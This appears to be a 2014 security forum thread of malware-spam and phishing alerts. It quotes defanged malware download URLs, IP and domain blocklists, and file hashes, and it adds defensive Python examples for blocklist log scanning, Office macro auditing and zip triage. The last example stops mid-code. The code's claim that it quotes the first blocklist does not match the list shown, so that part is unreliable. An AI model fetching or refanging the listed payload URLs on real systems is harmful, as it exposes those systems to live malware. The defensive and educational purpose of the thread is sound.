3 Nov 2014 - "An email saying 'A new invoice has been created. Please find it attached' pretending to come from TM Group Helpdesk Billing with a subject of 'A new invoice [random characters]' has been created for You' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Client,
A new invoice, WJ7647670C has been created. Please find it attached.
Kind regards, Marcellus Powell
TM Group
Helpdesk Billing
3 November 2014 : PI646028B.doc - Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3c31fec4b4f77ef581151d87313631956c18bbac82a30c389bdb59b3f5b1b31b/analysis/1415010191/
- http://blog.dynamoo.com/2014/11/tm-group-new-invoice-ab1234567c-has.html
3 Nov 2014
... Recommended blocklist:
91.222.139.45
213.140.115.29
149.62.168.210
111.125.170.132
121.78.88.208 "
___
Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
UPDATE 1: 2014-11-03 - "... different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54* and contains this malicious macro... This downloads a file from http ://hilfecenter-harz .de/1.exe which also has zero detections at VirusTotal... It also downloads a malicious DLL... this as a version of Cridex...
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter- harz .de
garfield67 .de
* https://www.virustotal.com/en/file/554695f6d0cd97c2a31fc7f205f3ac3b364f0154d70be41685731f1226e8eeaf/analysis/1415004635/
:mad: :fear:
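The "Recommended blocklist" sets in this post and in the Amazon / PurelyGadgets item above it are published defanged (spaces inserted around the dots) so they cannot be clicked by accident; before they are any use in a proxy or firewall they have to be refanged and normalised. The following is an added example, not code from Dynamoo or myonlinesecurity, that turns both blocklists into indicator sets and runs them over a few constructed Squid-style proxy log lines. Assumptions: the log format is Squid's native access.log (the destination IP is the last part of the hierarchy field), and the last blocklist line is a constructed sample of the other common defanging styles.

```python
# Added example, not from the original posts: refang published indicators and
# match them against proxy logs. Log lines are constructed for the demo.
import ipaddress
import re
from urllib.parse import urlsplit

# Both "Recommended blocklist" sets quoted above, still in the posts' defanged
# form; the final line is a constructed example of other defanging styles.
BLOCKLIST_TEXT = """
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter- harz .de
garfield67 .de
hxxp://example[.]test/1.exe
"""

def refang(token):
    """Undo common defanging: 'hxxp', '[.]', '(dot)', and inserted spaces."""
    t = token.strip().lower()
    t = t.replace("hxxp", "http").replace("[.]", ".").replace("(dot)", ".")
    t = re.sub(r"\s+", "", t)            # 'hilfecenter- harz .de' -> 'hilfecenter-harz.de'
    if "://" in t:
        t = urlsplit(t).hostname or ""   # keep only the host part of a URL
    return t.rstrip(".")

def parse_indicators(text):
    """Split a blocklist into (ip_set, domain_set); headings and junk are skipped."""
    ips, domains = set(), set()
    for line in text.splitlines():
        host = refang(line)
        if not host:
            continue
        try:
            ips.add(str(ipaddress.ip_address(host)))
            continue
        except ValueError:
            pass
        if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", host):
            domains.add(host)
    return ips, domains

def host_matches(host, domains):
    """Exact match or any subdomain of a listed domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

# Constructed Squid native access.log lines (not from the posts):
# time elapsed client status/code bytes method URL user hierarchy/peer type
SAMPLE_LOG = """\
1414752406.101    245 10.0.0.12 TCP_MISS/200 41234 GET http://ctmail.me/1.exe - HIER_DIRECT/84.40.9.34 application/x-msdownload
1415004635.220    310 10.0.0.12 TCP_MISS/200 88310 GET http://www.hilfecenter-harz.de/1.exe - HIER_DIRECT/37.139.23.200 application/x-msdownload
1415004700.004     12 10.0.0.15 TCP_MISS/200   512 GET http://www.example.org/ - HIER_DIRECT/93.184.216.34 text/html
1415004712.877     90 10.0.0.20 TCP_MISS/200  2048 POST http://213.143.97.18/gate.php - HIER_DIRECT/213.143.97.18 text/plain
"""

def scan_log(log_text, ips, domains):
    """Return (line_no, client, url, reasons) for every line touching an indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        f = line.split()
        if len(f) < 10:
            continue
        client, url, peer = f[2], f[6], f[8].rsplit("/", 1)[-1]
        host = urlsplit(url).hostname or ""
        reasons = []
        if peer in ips or host in ips:
            reasons.append(f"destination IP {peer if peer in ips else host} on blocklist")
        if host_matches(host, domains):
            reasons.append(f"host {host} on blocklist")
        if reasons:
            hits.append((n, client, url, reasons))
    return hits

if __name__ == "__main__":
    ip_set, domain_set = parse_indicators(BLOCKLIST_TEXT)
    for hit in scan_log(SAMPLE_LOG, ip_set, domain_set):
        print(hit)
```

Matching on the destination IP as well as the host catches the case where the macro fetches the binary by raw address, and suffix matching on domains catches `www.` and other subdomains that a list of bare apex names would otherwise miss.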
AplusWebMaster
2014-11-04, 14:03
FYI...
Fake 'New order' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/new-order-7757100-site-word-doc-malware/
4 Nov 2014 - "'New order 7757100' from site is an email saying 'Thank you for ordering' pretending to come from random names at random companies with a subject of 'New order 7757100 from site' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is -malformed- and contains a macro script virus... DO NOT follow the advice they give to enable macros to see the content. Almost all of these malicious word documents appear to be -blank- when opened...
Screenshots: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/New-order-7757100-from-site.png
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/protected-view-macros.png
4 November 2014 : Order561104135.doc - Current Virus total detections: 1/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/16e0fbdbab2fd8d88e8ab1a7ca42e4dc2ea9682ede6a06e6c3a85dae499cec1b/analysis/1415093505/
___
Fake 'Remittance' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duco-remittance-advice-november-word-doc-malware/
4 Nov 2014 - "An email saying 'Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP' pretending to come from DUCO with a subject of 'Remittance Advice November' [ random characters] with a malicious word document attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam
Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP
Regards,
Domenic Burton
Accounts Payable Department DUCO
4 November 2014 : De_BW574826C.doc - Current Virus total detections: 0/44*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/792e5c3c2886d6fe7d0b10a25fd78023a7b862a79bd6e461a5e23ecccbc371ef/analysis/1415106043/
- http://blog.dynamoo.com/2014/11/duco-remittance-advice-november-spam.html
4 Nov 2014
- https://www.virustotal.com/en/file/3d6378750d713270bbafc1a18754626d148396253429a6a70c018eadb988120a/analysis/1415110852/
... Behavioural information
TCP connections
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
213.140.115.29: https://www.virustotal.com/en/ip-address/213.140.115.29/information/
___
'C-93 Virus Alert' - Phish ...
- http://www.hoax-slayer.com/C93-virus-alert-phishing-scam.shtml
Nov 4, 2014 - "An email claiming to be from Windows Outlook warns that a 'C93 Virus' has been detected in your mailbox and you are therefore -required- to -click- a link to run a Norton anti-virus scan to resolve the issue. The email is -not- from Outlook or Microsoft. It is a phishing scam designed to trick you into giving your Microsoft Account login details to criminals... According to this email, which claims to be from 'Windows Outlook', a 'C93 Virus' has been detected in your mailbox. The message instructs you to click a link to run a Norton anti-virus scan that will 'remove all Trojan and viral bugs' from your account. But, warns the message, if you fail to run the scan, your mailbox will be -deactivated- ... Example:
Dear Outlook Member,
A C93 Virus has been detected in your mailbox, You are required to apply the new Norton AV security anti-virus to scan and to remove all Trojan and viral bugs from your mailbox Account, Failure to apply the scan your mailbox will be De-Activated to avoid our database from being infected.
Click on Optimal Scan and Log in to apply the service.
Thank you ...
If you click the link, you will be taken to a -fake- webpage that is designed to look like a genuine Microsoft account login. When you enter your login details and click the 'Sign In' button, you will be automatically -redirected- to a genuine Microsoft account page... the criminals can collect your login details and use them to hijack your real Microsoft Account. Because the same credentials are used to login to various Microsoft services, they are a valuable commodity for scammers... If you receive one of these -fake- virus warnings, do -not- click any links or open any attachments..."
___
Bitcoin bonanza - or blunders?
- https://www.virusbtn.com/blog/2014/11_04.xml
4 Nov 2014 - "... 'occasionally losing a lot of money through bugs and blunders'... 'hard not to feel dizzy and somewhat overwhelmed by the security issues and implications'.
> https://www.virusbtn.com/virusbulletin/archive/2014/11/figures/Pontiroli-1.jpg
Malware targeting Bitcoin wallets or using other people's resources to mine for cryptocurrencies are perhaps the least of our worries. What about virus code (or worse, child abuse material) ending up in the blockchain? Or the common flaw of transaction malleability? Or the almost existential threat of the "51% attack"? Cryptocurrencies are here to stay, but they come with their own unique set of problems that we cannot ignore... we're not in Kansas anymore..."
(More detail at the top virusbtn URL.)
- https://www.virusbtn.com/blog/2014/10_31a.xml
31 Oct 2014
___
Facebook: gov't requests for user data rises 24%
- http://www.reuters.com/article/2014/11/04/us-facebook-data-idUSKBN0IO21Z20141104
Nov 4, 2014 - "Facebook Inc said requests by governments for user information rose by about a quarter in the first half of 2014 over the second half of last year. In the first six months of 2014, governments around the world made 34,946 requests for data. During the same time, the amount of content restricted because of local laws increased about 19 percent... Google reported in September a 15 percent sequential increase in the number of requests in the first half of this year, and a 150 percent rise in the last five years, from governments around the world to reveal user information in criminal investigations."
:mad: :fear:
AplusWebMaster
2014-11-05, 15:31
FYI...
Backoff PoS malware - stealthier, more difficult to analyze
- http://net-security.org/malware_news.php?id=2906
Nov 5, 2014 - "... Backoff infections are still on the rise. Fortinet researchers* have recently managed to get their hands on a new Backoff variant that shows that its authors haven't been idle. This version also does not have a version number, but has been given the name Backoff ROM. Compared to the older versions, Backoff ROM disguises itself as a media player (mplayerc.exe) instead of a Java component in the autorun registry entries... Traffic between the malware and the C&C server is also encrypted, and the way the server responds with new commands for the malware has been simplified... for whatever reason, this new Backoff version does not have keylogging capabilities. But, the researchers believe that this is only a temporary change that will be reversed in newer versions..."
* http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware
- https://www.damballa.com/state-infections-report-q3-2014/
10/24/2014
> https://www.damballa.com/wp-content/uploads/2014/10/soi-q3-2014.jpg
- http://atlas.arbor.net/briefs/index#1351521298
Elevated Severity
6 Nov 2014
Analysis: Since approximately Sep 8, 2014, this new version of the Backoff PoS malware has been classified in the ASERT malware analysis infrastructure, which contains at least three hundred distinct instances of Backoff... Easily compromised systems proliferate, and weak remote access deployments are often the culprit. Among the more difficult to compromise systems, tactics such as spear phishing, vendor compromise, partner attacks featuring lateral movement and other strategies well-known to more dedicated threat actors are bearing fruit for the attackers. Proper isolation, hardening, and monitoring of PoS deployments and associated infrastructure are crucial to reducing risks and detecting attackers that may already be present. PoS is squarely in the sights of many threat actors which means that organizations running PoS and their support infrastructure must realize that they are a target...
Source: http://www.net-security.org/malware_news.php?id=2906
___
Banking Trojan DRIDEX uses Macros for Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Nov 5, 2014 - "... DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.
Sample spammed message
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex1.png
The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled — which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware:
Malicious attachment instructing users to enable the macro feature:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex2.png
It then performs information theft through methods like form grabbing, screenshots, and site injections... Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature. The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into clicking the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature...
Top affected countries, based on data from September-October 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex4.jpg
We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.
Top DRIDEX spam sending countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex5.jpg
... best to make sure to enable the macro security features* in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings..."
* https://office.microsoft.com/en-us/visio-help/about-macro-security-levels-HP001049689.aspx
___
'Free' Netflix Accounts: Good Luck With That...
- https://blog.malwarebytes.org/fraud-scam/2014/11/sites-offering-free-netflix-accounts-good-luck-with-that/
Nov 5, 2014 - "We’ve seen a number of Netflix themed websites which claim to offer up accounts / logins for fans of TV and movie streaming to get their fix -without- having to register or -pay- up to use the service...
1) freenetflixaccount(dot)info
This one is rather cookie-cutter and claims to have lots of accounts up for grab, linking to numerous “Netflix premium account” URLs further down the page.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx1.jpg?w=564
However, all of the live links lead to the same survey page:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx4.jpg
To get your hands on the supposed account credentials, you’d have to fill in an offer or sign up to whatever happens to be presented to you. Am I sensing an incoming theme here?…
2) freenetflixaccountasap(dot)com
This website has the visitor play an extremely long-winded and elaborate game of “click the thing”, distracting them with lots of options to choose from in order to watch some movies.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx5.jpg
... According to the text underneath the many scrolling blue bars, they claim to log you into an account from your chosen region via proxy, set up a bunch of options then log you out. They then “upload the account details” to Fileice, and ask the visitor to “Click below to download the login details”.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx12.jpg
... > https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx13.jpg
... Interesting to note that the “newly created” page has an entry on VirusTotal* from just over a week ago... Always be wary when presented with supposedly free accounts – remember that there’s something in it for the person offering them up, and it could be anything from survey scam affiliate cash and fakeouts to phishing and Malware attacks..."
* https://www.virustotal.com/en/url/d7d219b5549e7159b0722596750bcdbe6345eb39af17d24105735a03fd345e95/analysis/
___
E-ZPass SPAM/Phish ...
- http://www.networkworld.com/article/2842773/security0/have-e-zpass-watch-out-for-slimy-asprox-based-malware-ploy.html
Nov 3, 2014 - "The Internet Crime Complaint Center* today said it has gotten more than 560 complaints about a rip-off using the E-ZPass vehicle toll collection system that uses phishing techniques to deliver malware to your computer. E-ZPass is an association of 26 toll agencies in 15 states that operate the E-ZPass toll collection program..."
* https://www.ic3.gov/media/2014/141103.aspx
"... The IC3 has received more than 560 complaints in which a victim receives an e-mail stating they have not paid their toll bill. The e-mail gives instructions to download the invoice by using the link provided, but the -link- is actually a .zip file that contains an executable with location aware malware. Some of the command and control server locations are associated with the ASProx botnet..."
- http://stopmalvertising.com/spam-scams/e-zpass-themed-emails-lead-to-asprox.html
9 July 2014
Screenshot: http://stopmalvertising.com/research/images/ezpass-asprox.jpg
___
20 million new strains of malware - Q3 2014
- http://www.pandasecurity.com/mediacenter/malware/over-20-million-new-strains-of-malware-were-indentified-in-q3-2014/
Oct 31, 2014 - "... some 20 million new strains were created worldwide in the third quarter of the year, at a rate of 227,747 new samples every day. Similarly, the global infection ratio was 37.93%, slightly up on the previous quarter (36.87%)... Trojans are still the most common type of malware (78.08%). A long way behind in second place come viruses (8.89%), followed by worms (3.92%)... Trojans also accounted for most infections during this period, some 75% of the total, compared with 62.80% in the previous quarter. PUPs are still in second place, responsible for 14.55% of all infections, which is down on the second quarter figure of 24.77%. These are followed by adware/spyware (6.88%), worms (2.09%), and viruses (1.48%)..."
:mad: :fear:
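The Trend Micro item ends with the practical advice: enforce the Office macro security setting through Group Policy so a user cannot "Enable Content" on a blank invoice. What that setting looks like on disk, and how to check it, as an added example that is not code from Trend Micro or Microsoft: the audit below parses a `reg export` dump of the Office Trust Center keys, works out the effective VBA macro level per application (a value under `Software\Policies` set by GPO overrides the user's own choice), and emits the policy keys for a hardened baseline. Assumptions: the value name `VBAWarnings` and its meanings 1 = enable all, 2 = disable with notification (the default), 3 = disable except digitally signed, 4 = disable all without notification, under `HKCU\Software\[Policies\]Microsoft\Office\<version>\<app>\Security`, as used by Office 2010 (14.0) and 2013 (15.0); the `.reg` text is constructed for the demo, not taken from a real machine.

```python
# Added example, not from the Trend Micro post: audit Office macro settings
# from a 'reg export' dump and generate the hardening policy keys.
# Assumption: VBAWarnings semantics and key paths for Office 2010/2013 as
# described in the lead-in; SAMPLE_REG is constructed.

VBA_LEVELS = {
    1: "enable all macros",
    2: "disable all with notification (Office default; user can click Enable Content)",
    3: "disable all except digitally signed macros",
    4: "disable all without notification",
}
APPS = ("Word", "Excel", "PowerPoint")
POLICY_HIVE = r"hkey_current_user\software\policies\microsoft\office"
USER_HIVE = r"hkey_current_user\software\microsoft\office"

# Constructed 'reg export' output for the demo (not a real machine):
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security]
"VBAWarnings"=dword:00000001
"AccessVBOM"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security]
"VBAWarnings"=dword:00000002

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\15.0\Excel\Security]
"VBAWarnings"=dword:00000004
"""

def parse_reg(text):
    """Minimal .reg parser: {key (lowercased): {value name: value}}; dwords as int."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, value = line.partition("=")
            name = name.strip('"').lower()
            if value.startswith("dword:"):
                keys[current][name] = int(value[len("dword:"):], 16)
            else:
                keys[current][name] = value.strip('"')
    return keys

def effective_vba_level(keys, version, app):
    """GPO policy key wins over the user's Trust Center choice; absent => default 2."""
    for hive, source in ((POLICY_HIVE, "policy"), (USER_HIVE, "user")):
        values = keys.get(f"{hive}\\{version}\\{app.lower()}\\security", {})
        if "vbawarnings" in values:
            return values["vbawarnings"], source
    return 2, "default"

def audit_macro_settings(reg_text, version="15.0"):
    """One (app, level, source, verdict, description) tuple per Office app."""
    keys = parse_reg(reg_text)
    report = []
    for app in APPS:
        level, source = effective_vba_level(keys, version, app)
        # Level 2 is what every lure in these spam runs relies on: one click
        # and the downloader macro runs. Only 3 or 4 take that click away.
        verdict = "OK" if level >= 3 else ("CRITICAL" if level == 1 else "WARN")
        report.append((app, level, source, verdict, VBA_LEVELS.get(level, "unknown")))
    return report

def hardening_reg(version="15.0", level=3):
    """Emit a .reg fragment that pins the policy value for every app."""
    out = ["Windows Registry Editor Version 5.00", ""]
    for app in APPS:
        out.append(f"[HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Office\\{version}\\{app}\\Security]")
        out.append(f'"VBAWarnings"=dword:{level:08x}')
        out.append("")
    return "\n".join(out)

if __name__ == "__main__":
    for row in audit_macro_settings(SAMPLE_REG):
        print(row)
    print(hardening_reg())
```

In a real deployment the same values are set through the Office ADMX templates rather than an imported `.reg` file, and level 3 (signed macros only) is the usual compromise when some business documents legitimately carry macros; level 4 is the right answer for users who never need them.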
AplusWebMaster
2014-11-06, 14:20
FYI...
Fake Amazon SPAM - Word doc malware
- http://blog.mxlab.eu/2014/11/06/w97mdownloader-t-threat-attached-as-word-file-to-fake-emails-from-amazon-regarding-dispatched-order/
Nov 6, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Amazon .co.uk order has dispatched (#203-2083868-0173124)”. This email is sent from the spoofed address “Amazon .co.uk” <auto-shipping@ amazon .co.uk>” and has the following body:
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http ://www.amazon .co.uk/your-account
Your order #203-2083868-0173124 (received November 5, 2014)
Your right to cancel:
At Amazon .co.uk we want you to be delighted every time you shop with us. Occasionally though, we know you may want to return items. Read more about our Returns Policy at: http ://www.amazon .co.uk/returns-policy/
Further, under the United Kingdom’s Distance Selling Regulations, you have the right to cancel the contract for the purchase of any of these items within a period of 7 working days... If you’ve explored the above links but still need to get in touch with us, you will find more contact details at the online Help Desk.
Note: this e-mail was sent from a notification-only e-mail address that cannot accept incoming e-mail.
Please do not reply to this message.
Thank you for shopping at Amazon .co.uk
The attached file has the name Mail Attachment.doc and is approx. 230 kB large file. The malicious Word file is detected as W97M/Downloader.t, W97M.DownLoader.110 or W97M.Dropper.Obfus. At the time of writing, 4 of the 54 AV engines did detect the malicious file at Virus Total*..."
* https://www.virustotal.com/en/file/99077f53365f931bddb4028793f9722c25b7095ae61eae3f6b31f9d7225e8c27/analysis/1415272790/
- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
- https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/
___
Fake 'Order' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/successfull_order-032574522-word-doc-malware/
6 Nov 2014 - "An email saying 'This is a notice that the invoice has been generated on 05.11.2014' pretending to come from random names at random companies with a subject of 'Successfull_Order 032574522' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear Customer, [redacted]
This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 468824369.
Your credit card will be charged for 47.40 USD.
The payment and delivery information is in attached file.
Regards,
Systems Company,
Crocitto Greta
6 November 2014 : Order561104111.doc - Current Virus total detections: 6/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... embedded malware or macro..."
* https://www.virustotal.com/en/file/d16c465aade28e04c2b5d9488f8698affccd7e7dc0bf36b3ecfa996d33bcd7f6/analysis/1415152827/
___
Fake Bank SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-banque-royale-bank-interac-guillaume-gilnaught-fake-pdf-malware/
6 Nov 2014 - "'The Bank INTERAC to Guillaume Gilnaught was accepted' pretending to come from RBC Banque Royale < ibanking@ rbc .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/The-Bank-INTERAC-to-Guillaume-Gilnaught-was-accepted.png
6 November 2014: INTERAC_pmt_11062014_0345875.zip: Extracts to: INTERAC_pmt_11062014_0345875.exe
Current Virus total detections: 5/53* . This 'The Bank INTERAC to Guillaume Gilnaught was accepted' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cf7454645f1116d370dcc1ea979bb31866600c15880f69920ba65cdf941d6ffe/analysis/1415290279/
___
Western Union Payment Confirmation Spam
- http://threattrack.tumblr.com/post/101929253328/western-union-payment-confirmation-spam
Nov 6, 2014 - "Subjects Seen:
WUBS Outgoing Payment Confirmation for SOTR4465838
Typical e-mail details:
... This is an automatically generated response: please do not reply to this e-mail. For enquiries please contact Customer Service.
Attached you will find the Outgoing Payment Confirmation for SOTR4465838. Please confirm all details are correct and notify us immediately if there are any discrepancies.
Thank you for your business!
Malicious File Name and MD5:
9574536_11062014.zip (5ED4C6DE460B2869088C523606415B4B)
9574536_11062014.exe (C8A8F049313D1C67F1BAAF338FE5EDE0)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a0c7619e79b0504fac6a4441b0bdf838/tumblr_inline_nemiq798aI1r6pupn.png
Tagged: Western Union, Upatre
___
Apple blocks apps infected with WireLurker malware targeting iPhones and iPads
- http://www.theinquirer.net/inquirer/news/2379822/wirelurker-malware-targeting-iphones-and-ipads-via-mac-os-x
Nov 6, 2014 - "... Palo Alto Networks* discovered the malware threat that targets iPhones and iPads through Apple's Mac OS X operating system, putting an end to the age-old belief that iOS is virus-free. Apple has since responded, and said it has -blocked- third-party apps infected with the malware, which Palo Alto describes as the "biggest in scale" it has ever seen... "As always, we recommend that users download and install software from trusted sources.” Palo Alto discovered the new family of malware dubbed 'WireLurker', which is the first known malware that can attack iOS applications in a similar way to a traditional virus. Palo Alto describes the threat as heralding "a new era in malware attacking Apple's desktop and mobile platforms", and said that the malware is "the biggest in scale we have ever seen". WireLurker can attack iOS devices through Mac OS X using USB, and does so by installing third-party applications on non-jailbroken iPhones through 'enterprise provisioning'. The malware seems to be limited to China at present, where it is targeting devices via the Maiyadi App Store, a third-party Mac app store. WireLurker has been found in -467- OS X apps at Maiyadi, which Palo Alto claims have been downloaded 356,104 times so far... The firm also said that enterprises using Mac computers should ensure that mobile device traffic is routed through a threat prevention system."
* http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
___
Hackers devise new simplified Phishing
- http://www.darkreading.com/attacks-breaches/hackers-devise-new-simplified-phishing-method/d/d-id/1317242
Nov 5, 2014 - "... a more efficient way to get unwary online shoppers to part with their personal data and financial account information. The new technique, dubbed 'Operation Huyao' by the security researchers at Trend Micro* who discovered it, basically lessens the time and effort needed for attackers to mount a phishing campaign while also making such attacks harder to spot... only when the user actually attempts to make a purchase that the proxy program serves up a modified page that walks the victim through a checkout process designed to extract personal information and payment card or bank account information... the phishers employed various blackhat SEO techniques to ensure that people doing specific product-related searches online were served up with results containing malicious links to the targeted store. Users who clicked on the links were then routed to the department store's website via the malicious proxy... In the first half of 2014 for instance, the median uptime for phishing attacks was 8 hours and 42 minutes, meaning that half of all phishing attacks were active for less than nine, the APWG** has noted... Even so, phishing continues to be a major problem. In the first six months of 2014, the industry group counted more than 123,700 unique phishing attacks which was the highest since the second half of 2009. A total of -756- institutions were specifically targeted in these attacks, the largest number ever during a six-month period. Of these companies -Apple- was the most phished brand."
* http://blog.trendmicro.com/trendlabs-security-intelligence/new-phishing-technique-outfoxes-site-owners-operation-huyao/
** http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___
CVE-2014-1772 – IE vuln analysis
- http://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/
Nov 5, 2014 - "... privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035*... this vulnerability was already patched some time ago... This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better..."
* https://technet.microsoft.com/en-us/library/security/ms14-035.aspx - Critical
Updated: Jun 17, 2014
V1.1 (June 17, 2014): Corrected the severity table and vulnerability information to add CVE-2014-2782 as a vulnerability addressed by this update. This is an informational change only. Customers who have already successfully installed the update do not need to take any action.
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1772 - 9.3 (HIGH)
Last revised: 06/26/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2782 - 9.3 (HIGH)
Last revised: 06/26/2014
:mad: :fear:
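Two items in this post (the RBC "INTERAC" lure and the Western Union "WUBS" Upatre run) use the same trick: a zip whose only member is an .exe carrying a PDF icon, so that with Explorer's default of hiding known extensions the victim sees a PDF. The check a mail gateway or analyst should make is on content, not on name or icon. The following triage routine is an added example, not code from myonlinesecurity or ThreatTrack: it opens a zip in memory, identifies each member from its leading bytes (DOS header plus the `PE\0\0` signature at `e_lfanew` for executables, `%PDF-` for PDFs, the OLE2 signature for legacy Office files), flags executable and double extensions, and hashes each member for a VirusTotal lookup. The sample zip is constructed inline from a minimal MZ/PE stub and contains no real malware.

```python
# Added example, not from the posts above: offline triage of a zip attachment
# by file content rather than by name. The sample zip is constructed below.
import hashlib
import io
import zipfile

EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
DOC_EXT = {".pdf", ".doc", ".xls", ".jpg", ".txt", ".rtf"}

def sniff(data):
    """Identify the real format from leading bytes, not from the name or icon."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        off = int.from_bytes(data[0x3C:0x40], "little")      # e_lfanew
        if data[off:off + 4] == b"PE\x00\x00":
            return "pe-executable"
        return "dos-executable"
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole2-office-document"     # legacy .doc/.xls; may carry VBA macros
    if data.startswith(b"PK\x03\x04"):
        return "zip-container"            # .docx/.xlsx/.jar or a nested zip
    return "unknown"

def split_name(name):
    """Return (last extension, extension before it) of a member name, lowercased."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    inner = "." + parts[-2] if len(parts) > 2 else ""
    return ext, inner

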